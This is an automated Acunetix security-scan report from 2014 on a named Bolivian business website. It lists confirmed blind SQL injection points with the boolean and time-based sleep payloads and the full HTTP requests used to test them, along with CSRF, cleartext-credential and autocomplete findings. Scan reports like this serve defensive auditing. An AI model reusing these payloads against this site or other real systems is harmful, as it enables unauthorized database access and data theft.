Developer Report PDF

Acunetix Website Audit
16 May, 2014
Developer Report
Generated by Acunetix WVS Reporter (v9.0 Build 20130904)

Scan of http://www.cerroazul.com.bo:80/
Scan details
Scan information
Start time 16/05/2014 08:49:53 a.m.
Finish time 16/05/2014 09:26:18 a.m.
Scan time 36 minutes, 24 seconds
Profile Sql_Injection
Server information
Responsive True
Server banner Apache/2.4.9 (Unix) OpenSSL/1.0.1e-fips mod_fastcgi/mod_fastcgi-SNAP-0910052141
Server OS Unix
Server technologies PHP
Threat level
Acunetix Threat Level 3
One or more high-severity type vulnerabilities have been discovered by the scanner. A
malicious user can exploit these vulnerabilities and compromise the backend database
and/or deface your website.
Alerts distribution
Total alerts found 37

High 11
Medium 13
Low 0
Informational 13
Knowledge base
List of client scripts
These files contain Javascript code referenced from the website.
- /common/js/accordionmenu.js
- /common/js/jquery.min.js
- /common/js/cargar_index.js
- /common/js/banner/jquery.nivo.slider.pack.js
- /common/js/banner/jquery.nivo.slider.js
- /common/js/gallery_bottom/jquery.js
- /common/js/gallery_bottom/jquery.easing.1.3.js
- /common/js/gallery_bottom/jquery.cssAnimate.mini.js
- /common/js/gallery_bottom/jquery.touchwipe.min.js
- /common/js/gallery_bottom/jquery.mousewheel.min.js
- /common/js/gallery_bottom/jquery.themepunch.services.min.js
- /common/js/mapa.js
- /common/js/gmaps.js
- /common/js/login.js
- /common/js/jquery.md5.js
- /common/js/cargar_contacto.js
- /common/js/comentario.js
- /common/js/cargar_cata.js
- /common/js/parametros.js
- /common/js/registrarse.js
Acunetix Website Audit 2
- /common/js/jquery.history.js
- /common/js/jquery.galleriffic.js
- /common/js/jquery.opacityrollover.js
- /common/js/cargar_descripcion.js
- /common/js/actualizar_visita_cata.js
- /common/js/cargar_grupo.js
- /common/js/buscar.js
- /common/js/ubicaciones.js
- /common/js/search.js
- /common/jquery/jquery-1.4.2.js
- /common/jquery/ui/jquery.ui.core.js
- /common/jquery/ui/jquery.ui.widget.js
- /common/jquery/ui/jquery.ui.position.js
- /common/jquery/ui/jquery.ui.autocomplete.js
- /common/jquery/jquery-1.7.js
- /common/jquery/jquery-1.7.min.js
List of files with inputs

These files have at least one input (GET or POST).
- /common.php - 2 inputs
- /mapa.php - 1 inputs
- /sesion.php - 3 inputs
- /about.php - 1 inputs
- /index.php - 1 inputs
- /contacto.php - 2 inputs
- /comentario.php - 2 inputs
- /common/php/empresa/get_empresas.php - 1 inputs
- /common/php/search/get-datos.php - 1 inputs
- /common/php/search/get_datespag2.php - 1 inputs
- /common/php/catalogo/get_datos_descripcion.php - 1 inputs
- /common/php/catalogo/actualizar_cata.php - 1 inputs
- /common/php/contacto/get-datos.php - 1 inputs
- /common/php/contacto/enviar_datos.php - 1 inputs
- /common/php/comentario/get_datos.php - 1 inputs
- /common/php/comentario/get-datespag.php - 1 inputs
- /common/php/comentario/insertar_come.php - 1 inputs
- /catalogo.php - 1 inputs
- /suscribirse.php - 2 inputs
- /descripcion.php - 1 inputs
- /catalogo_grupo.php - 1 inputs
- /empresa.php - 1 inputs
- /privacidad.php - 1 inputs
- /listado.php - 1 inputs
List of external hosts

These hosts were linked from this website but they were not scanned because they are not listed in the list of hosts
allowed.(Settings->Scanners settings->Scanner->List of hosts allowed).
- maps.google.com
Alerts summary

Blind SQL Injection
Affects Variation
/about.php s1
/catalogo.php 1
/catalogo_grupo.php 2
/comentario.php 1
/common.php 1
/common/php/catalogo/get_datos_descripcion.php 2
/common/php/comentario/get_datos.php 1
/common/php/search/get-datos.php 1
/contacto.php 1
HTML form without CSRF protection
Affects Variation
/comentario.php s1
/common.php 1
/contacto.php 1
/listado.php 1
/sesion.php 3
/suscribirse.php 2
User credentials are sent in clear text
Affects Variation
/listado.php s1
/sesion.php 1
/suscribirse.php 2
Broken links
Affects Variation
/common/css/ie-css3.htc s1
/common/css/menuUni.css 1
/common/css/minilistas_fcl.css 1
/common/css/minilistasfcl.css 1
/common/css/spritefcl.css 1
/common/css/spritefcl_class.css 1
/listado_empresas.php 1
/www.facebook.com/BarracaCerroAzul 1
Password type input with auto-complete enabled
Affects Variation
/empresa.php s1
/listado.php 1
/privacidad.php 1
/sesion.php 1
/suscribirse.php 1

Alert details
Blind SQL Injection
Severity High
Type Validation
Reported by module Scripting (Blind_Sql_Injection.script)
Description
This script is possibly vulnerable to SQL Injection attacks.
SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input.
An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't
properly filter out dangerous characters.
This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is
relatively easy to protect against, there is a large number of web applications vulnerable.
Impact
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your
database and/or expose sensitive information.
Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access
for the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use sub
selects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell
commands on the underlying operating system.
Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server
functions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.
Recommendation
Your script should filter metacharacters from user input.
Check detailed information for more information about fixing this vulnerability.
References
OWASP Injection Flaws
Acunetix SQL Injection Attack
How to check for SQL injection vulnerabilities
SQL Injection Walkthrough
OWASP PHP Top 5
VIDEO: SQL Injection tutorial
Affected items
/about.php
Details
URL encoded GET input id was set to 2/**/AND/**/810=810
Tests performed:
- 0+0+0+2 => TRUE
- 0+810*805+2 => FALSE
- 12-5-2-999 => FALSE
- 12-5-2-3 => TRUE
- 12-2*5+0+0+1-1 => TRUE
- 12-2*6+0+0+1-1 => FALSE
- 2 AND 2+1-1-1=1 AND 810=810 => TRUE
- 2 AND 3+1-1-1=1 AND 810=810 => FALSE[ ... (line truncated)
Request headers
GET /about.php?id=2/**/AND/**/810%3d810 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.cerroazul.com.bo:80/
Cookie: PHPSESSID=1870c0ffa8e2cdfe55b2a28602d6709d
Host: www.cerroazul.com.bo
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/catalogo.php
Details
Tests performed:
- 0+0+0+2 => TRUE
- 0+943*938+2 => FALSE
- 12-5-2-999 => FALSE
- 12-5-2-3 => TRUE
- 12-2*5+0+0+1-1 => TRUE
- 12-2*6+0+0+1-1 => FALSE
- 2 AND 2+1-1-1=1 AND 943=943 => TRUE
Request headers
GET /catalogo.php?id=2/**/AND/**/943%3d943 HTTP/1.1
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/catalogo_grupo.php
Details
URL encoded GET input id_fami was set to
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
Tests performed:
- if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ =>
6.63 s
- if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ ...
(line truncated)
Request headers
GET
/catalogo_grupo.php?id=1&id_fami=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3ds
ysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&id_grupo
=13 HTTP/1.1
Chrome/28.0.1500.63 Safari/537.36
Accept: */*

/catalogo_grupo.php
Details
URL encoded GET input id_grupo was set to
Tests performed:
9.532 s
- if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR" ...
(line truncated)
Request headers
GET
/catalogo_grupo.php?id=1&id_fami=3&id_grupo=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(i
f(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22
*/ HTTP/1.1
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/comentario.php
Details
Tests performed:
- 0+0+0+2 => TRUE
- 0+505*500+2 => FALSE
- 12-5-2-999 => FALSE
- 12-5-2-3 => TRUE
- 12-2*5+0+0+1-1 => TRUE
- 12-2*6+0+0+1-1 => FALSE
- 2 AND 2+1-1-1=1 AND 505=505 => TRUE
Request headers
GET /comentario.php?id=2/**/AND/**/505%3d505 HTTP/1.1
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/common.php
Details
Tests performed:
- 0+0+0+2 => TRUE
- 0+757*752+2 => FALSE
- 12-5-2-999 => FALSE
- 12-5-2-3 => TRUE
- 12-2*5+0+0+1-1 => TRUE
- 12-2*6+0+0+1-1 => FALSE
- 2 AND 2+1-1-1=1 AND 757=757 => TRUE
Request headers
GET /common.php?id=2/**/AND/**/757%3d757 HTTP/1.1
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/common/php/catalogo/get_datos_descripcion.php
Details
URL encoded GET input id_cata was set to 9/**/AND/**/407=407
Tests performed:
- 0+0+0+9 => TRUE
- 0+407*402+9 => FALSE
- 19-5-2-999 => FALSE
- 19-5-2-3 => TRUE
- 19-2*5+0+0+1-1 => TRUE
- 19-2*6+0+0+1-1 => FALSE
- 9 AND 2+1-1-1=1 AND 407=407 => TRUE
- 9 AND 3+1-1-1=1 AND 407=407 => FALSE[/b ... (line truncated)
Request headers
GET
/common/php/catalogo/get_datos_descripcion.php?id_cata=9/**/AND/**/407%3d407&id_empre=1
HTTP/1.1
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/common/php/catalogo/get_datos_descripcion.php
Details
URL encoded GET input id_empre was set to 1/**/AND/**/938=938
Tests performed:
- 0+0+0+1 => TRUE
- 0+938*933+1 => FALSE
- 11-5-2-999 => FALSE
- 11-5-2-3 => TRUE
- 11-2*5+0+0+1-1 => TRUE
- 11-2*6+0+0+1-1 => FALSE
- 1 AND 2+1-1-1=1 AND 938=938 => TRUE
- 1 AND 3+1-1-1=1 AND 938=938 => FALSE[/ ... (line truncated)
Request headers
GET
/common/php/catalogo/get_datos_descripcion.php?id_cata=9&id_empre=1/**/AND/**/938%3d938
HTTP/1.1
Chrome/28.0.1500.63 Safari/537.36
Accept: */*

/common/php/comentario/get_datos.php
Details
URL encoded GET input id_empre was set to
Tests performed:
3.105 s
- if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR" ...
(line truncated)
Request headers
GET
/common/php/comentario/get_datos.php?id_empre=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR
(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%
22*/ HTTP/1.1
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/common/php/search/get-datos.php
Details
URL encoded GET input id_dpto was set to 1/**/AND/**/32=32
Tests performed:
- 0+0+0+1 => TRUE
- 0+32*27+1 => FALSE
- 11-5-2-999 => FALSE
- 11-5-2-3 => TRUE
- 11-2*5+0+0+1-1 => TRUE
- 11-2*6+0+0+1-1 => FALSE
- 1 AND 2+1-1-1=1 AND 32=32 => TRUE
- 1 AND 3+1-1-1=1 AND 32=32 => FALSE[/li ... (line truncated)
Request headers
GET /common/php/search/get-datos.php?id_dpto=1/**/AND/**/32%3d32&parametro= HTTP/1.1
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/contacto.php
Details
Tests performed:
- 0+0+0+2 => TRUE
- 0+918*913+2 => FALSE
- 12-5-2-999 => FALSE
- 12-5-2-3 => TRUE
- 12-2*5+0+0+1-1 => TRUE
- 12-2*6+0+0+1-1 => FALSE
- 2 AND 2+1-1-1=1 AND 918=918 => TRUE
Request headers
GET /contacto.php?id=2/**/AND/**/918%3d918 HTTP/1.1
Chrome/28.0.1500.63 Safari/537.36
Accept: */*

HTML form without CSRF protection
Severity Medium
Type Informational
Reported by module Crawler
Description
This alert may be a false positive, manual confirmation is required.
Cross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF, is a
type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website
trusts.
Acunetix WVS found a HTML form with no apparent CSRF protection implemented. Consult details for more information
about the affected HTML form.
Impact
An attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF
exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator
account, this can compromise the entire web application.
Recommendation
Check if this form requires CSRF protection and implement CSRF countermeasures if necessary.
Affected items
/comentario.php
Details
Form name: <empty>
Form action: http://www.cerroazul.com.bo/comentario.php
Form method: GET
Form inputs:
- name [Text]
- comentario [TextArea]
Request headers
GET /comentario.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.cerroazul.com.bo/common.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Chrome/28.0.1500.63 Safari/537.36
Accept: */*

/common.php
Details
Form name: <empty>
Form action: http://www.cerroazul.com.bo/common.php
Form method: GET
Form inputs:
- name [Text]
- phone [Text]
- mensaje [TextArea]
Request headers
GET /common.php HTTP/1.1
Pragma: no-cache
Referer: http://www.cerroazul.com.bo/
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/contacto.php
Details
Form name: <empty>
Form action: http://www.cerroazul.com.bo/contacto.php
Form method: GET
Form inputs:
- name [Text]
- correo [Text]
- phone [Text]
- mensaje [TextArea]
Request headers
GET /contacto.php HTTP/1.1
Pragma: no-cache
Chrome/28.0.1500.63 Safari/537.36
Accept: */*

/listado.php
Details
Form name: <empty>
Form action: http://www.cerroazul.com.bo/listado.php
Form method: POST
Form inputs:
- txt_nombre [Text]
- password [Password]
Request headers
GET /listado.php HTTP/1.1
Pragma: no-cache
Referer: http://www.cerroazul.com.bo/contacto.php
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/sesion.php
Details
Form name: <empty>
Form action: http://www.cerroazul.com.bo/sesion.php
Form method: POST
Form inputs:
- usuario [Text]
- phone [Text]
- phone [Text]
- password [Text]
Request headers
GET /sesion.php HTTP/1.1
Pragma: no-cache
Chrome/28.0.1500.63 Safari/537.36
Accept: */*

/sesion.php
Details
Form name: <empty>
Form method: POST
Form inputs:
- phone [Text]
Request headers
Pragma: no-cache
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/sesion.php
Details
Form name: <empty>
Form method: POST
Form inputs:
- phone [Text]
Request headers
Pragma: no-cache
Chrome/28.0.1500.63 Safari/537.36
Accept: */*

/suscribirse.php
Details
Form name: <empty>
Form action: http://www.cerroazul.com.bo/suscribirse.php
Form method: POST
Form inputs:
- txt_usuario [Text]
Request headers
GET /suscribirse.php HTTP/1.1
Pragma: no-cache
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/suscribirse.php
Details
Form name: <empty>
Form method: POST
Form inputs:
- txt_nombre [Text]
- name [Text]
- phone [Text]
Request headers
Pragma: no-cache
Chrome/28.0.1500.63 Safari/537.36
Accept: */*

User credentials are sent in clear text
Severity Medium
Type Informational
Description
User credentials are transmitted over an unencrypted channel. This information should always be transferred via an
encrypted channel (HTTPS) to avoid being intercepted by malicious users.
Impact
A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection.
Recommendation
Because user credentials are considered sensitive information, should always be transferred to the server over an
encrypted connection (HTTPS).
Affected items
/listado.php
Details
Form name: <empty>
Form action: http://www.cerroazul.com.bo/listado.php
Form method: POST
Form inputs:
- txt_nombre [Text]
Request headers
Pragma: no-cache
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/sesion.php
Details
Form name: <empty>
Form method: POST
Form inputs:
- phone [Text]
Request headers

Pragma: no-cache
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/suscribirse.php
Details
Form name: <empty>
Form method: POST
Form inputs:
- txt_usuario [Text]
Request headers
Pragma: no-cache
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/suscribirse.php
Details
Form name: <empty>
Form method: POST
Form inputs:
- txt_nombre [Text]
- name [Text]
- phone [Text]
Request headers
Pragma: no-cache

Chrome/28.0.1500.63 Safari/537.36
Accept: */*

Broken links
Severity Informational
Type Informational
Description
A broken link refers to any link that should take you to a document, image or webpage, that actually results in an error.
This page was linked from the website but it is inaccessible.
Impact
Problems navigating the site.
Recommendation
Remove the links to this file or make it accessible.
Affected items
/common/css/ie-css3.htc
Details
For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") >
select Referrers Tab from the bottom of the Information pane.
Request headers
GET /common/css/ie-css3.htc HTTP/1.1
Pragma: no-cache
Referer: http://www.cerroazul.com.bo/common/css/menu_acor.css
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/common/css/menuUni.css
Details
Request headers
GET /common/css/menuUni.css HTTP/1.1
Pragma: no-cache
Chrome/28.0.1500.63 Safari/537.36
Accept: */*

/common/css/minilistas_fcl.css
Details
Request headers
GET /common/css/minilistas_fcl.css HTTP/1.1
Pragma: no-cache
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/common/css/minilistasfcl.css
Details
Request headers
GET /common/css/minilistasfcl.css HTTP/1.1
Pragma: no-cache
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/common/css/spritefcl.css
Details
Request headers
GET /common/css/spritefcl.css HTTP/1.1
Pragma: no-cache
Chrome/28.0.1500.63 Safari/537.36
Accept: */*

/common/css/spritefcl_class.css
Details
Request headers
GET /common/css/spritefcl_class.css HTTP/1.1
Pragma: no-cache
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/listado_empresas.php
Details
Request headers
GET /listado_empresas.php HTTP/1.1
Pragma: no-cache
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/www.facebook.com/BarracaCerroAzul
Details
Request headers
GET /www.facebook.com/BarracaCerroAzul HTTP/1.1
Pragma: no-cache
Chrome/28.0.1500.63 Safari/537.36
Accept: */*

Password type input with auto-complete enabled
Severity Informational
Type Informational
Description
When a new name and password is entered in a form and the form is submitted, the browser asks if the password
should be saved. Thereafter when the form is displayed, the name and password are filled in automatically or are
completed as the name is entered. An attacker with local access could obtain the cleartext password from the browser
cache.
Impact
Possible sensitive information disclosure
Recommendation
The password auto-complete should be disabled in sensitive applications.
To disable auto-complete, you may use a code similar to:
<INPUT TYPE="password" AUTOCOMPLETE="off">
Affected items
/empresa.php
Details
Password type input named password from form with ID form-homepage-contact with action empresa.php has
autocomplete enabled.
Request headers
GET /empresa.php HTTP/1.1
Pragma: no-cache
Referer: http://www.cerroazul.com.bo/sesion.php
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/listado.php
Details
Password type input named password from form with ID form-homepage-contact with action listado.php has
Request headers
Pragma: no-cache

Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/privacidad.php
Details
Password type input named password from form with ID form-homepage-contact with action privacidad.php has
Request headers
GET /privacidad.php HTTP/1.1
Pragma: no-cache
Referer: http://www.cerroazul.com.bo/sesion.php
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/sesion.php
Details
Password type input named password from form with ID form-homepage-contact with action sesion.php has
Request headers
Pragma: no-cache
Chrome/28.0.1500.63 Safari/537.36
Accept: */*
/suscribirse.php
Details
Password type input named password from form with ID form-homepage-contact with action suscribirse.php has
Request headers
Pragma: no-cache
Chrome/28.0.1500.63 Safari/537.36
Accept: */*

Scanned items (coverage report)
Scanned 126 URLs. Found 22 vulnerable.
URL: http://www.cerroazul.com.bo/
No vulnerabilities has been identified for this URL
No input(s) found for this URL
URL: http://www.cerroazul.com.bo/common.php
Vulnerabilities has been identified for this URL
4 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
id URL encoded GET
Input scheme 2
mensaje URL encoded GET
name URL encoded GET
phone URL encoded GET
URL: http://www.cerroazul.com.bo/listado_empresas.php
URL: http://www.cerroazul.com.bo/mapa.php
Inputs
Input scheme 1
id URL encoded GET
URL: http://www.cerroazul.com.bo/sesion.php
Inputs
Input scheme 1
password URL encoded POST
phone URL encoded POST
Input scheme 2
Input scheme 3
usuario URL encoded POST
URL: http://www.cerroazul.com.bo/about.php
Inputs

Input scheme 1
id URL encoded GET
URL: http://www.cerroazul.com.bo/index.php
Inputs
Input scheme 1
id URL encoded GET
URL: http://www.cerroazul.com.bo/contacto.php
Inputs
Input scheme 1
id URL encoded GET
Input scheme 2
correo URL encoded GET
phone URL encoded GET
URL: http://www.cerroazul.com.bo/comentario.php
Inputs
Input scheme 1
id URL encoded GET
Input scheme 2
comentario URL encoded GET
URL: http://www.cerroazul.com.bo/common/
URL: http://www.cerroazul.com.bo/common/css/
URL: http://www.cerroazul.com.bo/common/css/reset.css
URL: http://www.cerroazul.com.bo/common/css/boton.css

URL: http://www.cerroazul.com.bo/common/css/styles.css
URL: http://www.cerroazul.com.bo/common/css/menuUni.css
URL: http://www.cerroazul.com.bo/common/css/basefcl.css
URL: http://www.cerroazul.com.bo/common/css/spritefcl.css
URL: http://www.cerroazul.com.bo/common/css/base_header.css
URL: http://www.cerroazul.com.bo/common/css/nivo-slider.css
URL: http://www.cerroazul.com.bo/common/css/minilistasfcl.css
URL: http://www.cerroazul.com.bo/common/css/spritefcl_class.css
URL: http://www.cerroazul.com.bo/common/css/accordionmenu.css
URL: http://www.cerroazul.com.bo/common/css/minilistas_fcl.css
URL: http://www.cerroazul.com.bo/common/css/gallery_bottom/
URL: http://www.cerroazul.com.bo/common/css/gallery_bottom/style.css
URL: http://www.cerroazul.com.bo/common/css/gallery_bottom/settings.css
URL: http://www.cerroazul.com.bo/common/css/gallery_bottom/css-family.css
URL: http://www.cerroazul.com.bo/common/css/menuuni.css

URL: http://www.cerroazul.com.bo/common/css/style2.css
URL: http://www.cerroazul.com.bo/common/css/menuicon.css
URL: http://www.cerroazul.com.bo/common/css/catalogo.css
URL: http://www.cerroazul.com.bo/common/css/listas_fcl.css
URL: http://www.cerroazul.com.bo/common/css/img
URL: http://www.cerroazul.com.bo/common/css/basic.css
URL: http://www.cerroazul.com.bo/common/css/galleriffic-3.css
URL: http://www.cerroazul.com.bo/common/css/menu_acor.css
URL: http://www.cerroazul.com.bo/common/css/ie-css3.htc
URL: http://www.cerroazul.com.bo/common/images/
URL: http://www.cerroazul.com.bo/common/images/empresas/
URL: http://www.cerroazul.com.bo/common/images/uploads/
URL: http://www.cerroazul.com.bo/common/images/uploads/catalogo/
URL: http://www.cerroazul.com.bo/common/images/uploads/catalogo/thumb/
URL: http://www.cerroazul.com.bo/common/images/banners/

URL: http://www.cerroazul.com.bo/common/images/images_menu/
URL: http://www.cerroazul.com.bo/common/images/gallery_bottom/
URL: http://www.cerroazul.com.bo/common/images/site
URL: http://www.cerroazul.com.bo/common/js/
URL: http://www.cerroazul.com.bo/common/js/accordionmenu.js
URL: http://www.cerroazul.com.bo/common/js/jquery.min.js
URL: http://www.cerroazul.com.bo/common/js/cargar_index.js
URL: http://www.cerroazul.com.bo/common/js/banner/
URL: http://www.cerroazul.com.bo/common/js/banner/jquery.nivo.slider.pack.js
URL: http://www.cerroazul.com.bo/common/js/banner/jquery.nivo.slider.js
URL: http://www.cerroazul.com.bo/common/js/gallery_bottom/
URL: http://www.cerroazul.com.bo/common/js/gallery_bottom/jquery.js
URL: http://www.cerroazul.com.bo/common/js/gallery_bottom/jquery.easing.1.3.js
URL: http://www.cerroazul.com.bo/common/js/gallery_bottom/jquery.cssAnimate.mini.js
URL: http://www.cerroazul.com.bo/common/js/gallery_bottom/jquery.touchwipe.min.js

URL: http://www.cerroazul.com.bo/common/js/gallery_bottom/jquery.mousewheel.min.js
URL: http://www.cerroazul.com.bo/common/js/gallery_bottom/jquery.themepunch.services.min.js
URL: http://www.cerroazul.com.bo/common/js/mapa.js
URL: http://www.cerroazul.com.bo/common/js/gmaps.js
URL: http://www.cerroazul.com.bo/common/js/login.js
URL: http://www.cerroazul.com.bo/common/js/jquery.md5.js
URL: http://www.cerroazul.com.bo/common/js/cargar_contacto.js
URL: http://www.cerroazul.com.bo/common/js/comentario.js
URL: http://www.cerroazul.com.bo/common/js/cargar_cata.js
URL: http://www.cerroazul.com.bo/common/js/parametros.js
URL: http://www.cerroazul.com.bo/common/js/registrarse.js
URL: http://www.cerroazul.com.bo/common/js/jquery.history.js
URL: http://www.cerroazul.com.bo/common/js/jquery.galleriffic.js
URL: http://www.cerroazul.com.bo/common/js/jquery.opacityrollover.js
URL: http://www.cerroazul.com.bo/common/js/cargar_descripcion.js

URL: http://www.cerroazul.com.bo/common/js/actualizar_visita_cata.js
URL: http://www.cerroazul.com.bo/common/js/cargar_grupo.js
URL: http://www.cerroazul.com.bo/common/js/buscar.js
URL: http://www.cerroazul.com.bo/common/js/ubicaciones.js
URL: http://www.cerroazul.com.bo/common/js/search.js
URL: http://www.cerroazul.com.bo/common/jquery/
URL: http://www.cerroazul.com.bo/common/jquery/themes/
URL: http://www.cerroazul.com.bo/common/jquery/themes/base/
URL: http://www.cerroazul.com.bo/common/jquery/themes/base/jquery.ui.all.css
URL: http://www.cerroazul.com.bo/common/jquery/themes/base/jquery.ui.theme.css
URL: http://www.cerroazul.com.bo/common/jquery/themes/base/jquery.ui.autocomplete.css
URL: http://www.cerroazul.com.bo/common/jquery/jquery-1.4.2.js
URL: http://www.cerroazul.com.bo/common/jquery/ui/
URL: http://www.cerroazul.com.bo/common/jquery/ui/jquery.ui.core.js
URL: http://www.cerroazul.com.bo/common/jquery/ui/jquery.ui.widget.js

URL: http://www.cerroazul.com.bo/common/jquery/ui/jquery.ui.position.js
URL: http://www.cerroazul.com.bo/common/jquery/ui/jquery.ui.autocomplete.js
URL: http://www.cerroazul.com.bo/common/jquery/jquery-1.7.js
URL: http://www.cerroazul.com.bo/common/jquery/jquery-1.7.min.js
URL: http://www.cerroazul.com.bo/common/site
URL: http://www.cerroazul.com.bo/common/site/common
URL: http://www.cerroazul.com.bo/common/imagenes
URL: http://www.cerroazul.com.bo/common/layout_miarroba
URL: http://www.cerroazul.com.bo/common/layout_miarroba/sprites
URL: http://www.cerroazul.com.bo/common/php/
URL: http://www.cerroazul.com.bo/common/php/empresa/
URL: http://www.cerroazul.com.bo/common/php/empresa/get_empresas.php
Inputs
Input scheme 1
id_dpto URL encoded GET
URL: http://www.cerroazul.com.bo/common/php/search/
URL: http://www.cerroazul.com.bo/common/php/search/get-datos.php
Inputs

Input scheme 1
id_dpto URL encoded GET
parametro URL encoded GET
URL: http://www.cerroazul.com.bo/common/php/search/get_paginador2.php
URL: http://www.cerroazul.com.bo/common/php/search/get_datespag2.php
Inputs
Input scheme 1
vf_param URL encoded GET
URL: http://www.cerroazul.com.bo/common/php/catalogo/
URL: http://www.cerroazul.com.bo/common/php/catalogo/get_datos_descripcion.php
Inputs
Input scheme 1
id_cata URL encoded GET
id_empre URL encoded GET
URL: http://www.cerroazul.com.bo/common/php/catalogo/actualizar_cata.php
Inputs
Input scheme 1
URL: http://www.cerroazul.com.bo/common/php/contacto/
URL: http://www.cerroazul.com.bo/common/php/contacto/get-datos.php
Inputs
Input scheme 1
URL: http://www.cerroazul.com.bo/common/php/contacto/enviar_datos.php
Inputs

Input scheme 1
correo URL encoded GET
nombre URL encoded GET
telefono URL encoded GET
URL: http://www.cerroazul.com.bo/common/php/comentario/
URL: http://www.cerroazul.com.bo/common/php/comentario/get_datos.php
Inputs
Input scheme 1
URL: http://www.cerroazul.com.bo/common/php/comentario/get-paginador.php
URL: http://www.cerroazul.com.bo/common/php/comentario/get-datespag.php
Inputs
Input scheme 1
vf_param URL encoded GET
URL: http://www.cerroazul.com.bo/common/php/comentario/insertar_come.php
Inputs
Input scheme 1
descripcion URL encoded GET
id_padre URL encoded GET
nombre URL encoded GET
URL: http://www.cerroazul.com.bo/catalogo.php
Inputs
Input scheme 1
id URL encoded GET
URL: http://www.cerroazul.com.bo/suscribirse.php
Inputs

Input scheme 1
txt_usuario URL encoded POST
Input scheme 2
name URL encoded POST
txt_nombre URL encoded POST
URL: http://www.cerroazul.com.bo/descripcion.php
Inputs
Input scheme 1
id URL encoded GET
URL: http://www.cerroazul.com.bo/catalogo_grupo.php
Inputs
Input scheme 1
id URL encoded GET
id_fami URL encoded GET
id_grupo URL encoded GET
URL: http://www.cerroazul.com.bo/www.facebook.com
URL: http://www.cerroazul.com.bo/www.facebook.com/BarracaCerroAzul
URL: http://www.cerroazul.com.bo/empresa.php
Inputs
Input scheme 1
URL: http://www.cerroazul.com.bo/ubicacion.php
URL: http://www.cerroazul.com.bo/privacidad.php
Inputs

Input scheme 1
URL: http://www.cerroazul.com.bo/listado.php
Inputs
Input scheme 1
txt_nombre URL encoded POST
URL: http://www.cerroazul.com.bo/undefined

Developer Report PDF

Încărcat de

Informații document

Titlu original

Drepturi de autor

Formate disponibile

Partajați acest document

Partajați sau inserați document

Opțiuni de partajare

Vi se pare util acest document?

Este necorespunzător acest conținut?

Drepturi de autor:

Formate disponibile

Developer Report PDF

Încărcat de

Drepturi de autor:

Formate disponibile

Acunetix Website Audit

Generated by Acunetix WVS Reporter (v9.0 Build 20130904)

Total alerts found 37

List of files with inputs

List of external hosts

Acunetix Website Audit 3

HTML form without CSRF protection

User credentials are sent in clear text

Password type input with auto-complete enabled

Acunetix Website Audit 4

Blind SQL Injection

Acunetix Website Audit 6

Acunetix Website Audit 8

Acunetix Website Audit 10

Acunetix Website Audit 11

Acunetix Website Audit 12

Acunetix Website Audit 13

Acunetix Website Audit 14

